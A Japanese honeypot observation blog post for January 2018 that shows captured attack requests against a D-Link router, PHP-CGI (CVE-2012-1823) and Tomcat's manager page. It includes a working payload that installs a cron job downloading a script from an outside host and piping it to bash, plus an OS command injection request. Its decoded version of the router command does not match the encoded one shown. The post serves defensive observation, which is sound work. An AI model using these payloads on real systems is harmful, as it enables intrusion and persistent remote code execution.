ハニーポット観察日記 (2018年1月分)
遅くなりましたが
ハニーポット観察日記、2018年1月分です。
D-LINK DIR-610 ルータの脆弱性を狙った攻撃
POST /command.php HTTP/1.1
Accept: */*
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%45%30%5C%5C%78%31%34%5C%5C%78%30%30%5C%5C%78%30%30%5C%5C%78%30%30%20%3E%3E%20%64%72%6F%70%20%26%26%20%65%63%68%6F%20%4F%4B
cmd=$cmd の形式のパラメータを受け付けているページ command.php があり、ここでコマンドを指定すると認証等を介さずOSコマンドを実行できてしまう、ということだそうです。どうしてこんな脆弱性が出来てしまったのでしょうね……
cmdのところをURLデコードするとこんな感じになります。
cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt
/var/tmp 配下で、610cker.txt という名前のテキストファイルを作成し、最後にテキストファイルの内容を出力しています。このコマンド自体にはさほど意味はなさそうで、どちらかというとこのコマンドによって、脆弱性の有るサーバーを選り分けている感じですね。
610cker.txt という名前はターゲットとしているルーターの型番を示しているという話もあるようです。以下サイトの解説が詳しいです。
参考 : Observing Large-Scale Router Exploit Attempts | ProtectWise™
Apache Magica (CVE-2012-1823) 攻撃
魔法少女アパッチ☆マギカ攻撃の愛称(?)で親しまれている、PHP の脆弱性を狙った攻撃を、私のハニーポットでも観測することができました。 PHPer としてもこれは見逃すわけにはいきません!
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=%22%22+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
Host: localhost
Accept: */*
User-agent: NYU
Content-Length: 256
Content-Type: application/x-www-form-urlencoded
<?php system("crontab -r; wget -V&&echo \"1 * * * * wget -q -O - http://internetresearch.is/robots.txt?php 2>/dev/null|bash;\"|crontab -;wget -V||curl -V|echo \"1 * * * * curl -s http://internetresearch.is/robots.txt?php 2>/dev/null|bash;\"|crontab -"); ?>*
脆弱性の詳細については、徳丸浩さんのブログで詳しく書かれているので、そちらをご参照ください。 CGI版PHPに対する魔法少女アパッチマギカ攻撃を観測しました | 徳丸浩の日記
毎時1分にファイルをダウンロードして実行しているようです。こういうログを見るとPHPのバージョンアップとか、堅牢なコーディングとか、ちゃんとやらなくてはなーと心から思いますね……。
Tomcatのアプリケーションマネージャを狙ったブルートフォース攻撃
GET /manager/html HTTP/1.1
Content-Type: text/html
Host: xxx.xxx.xxx.xxx
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic YWRtaW46dG9tY2F0
Basic認証の部分は
- admin:admin
- admin:tomcat
など、ありふれたIDとパスワードが連続してアクセスされていました。こういうログを見るとIDとパスワードとか、ちゃんと設定しなくてはなーと心から思いますね……
おわりに
というわけで2回目のハニーポット観察日記でした。次回は少し趣向を変えて、ツールに着目してログを観察してみようかな〜と思っています。ではまた!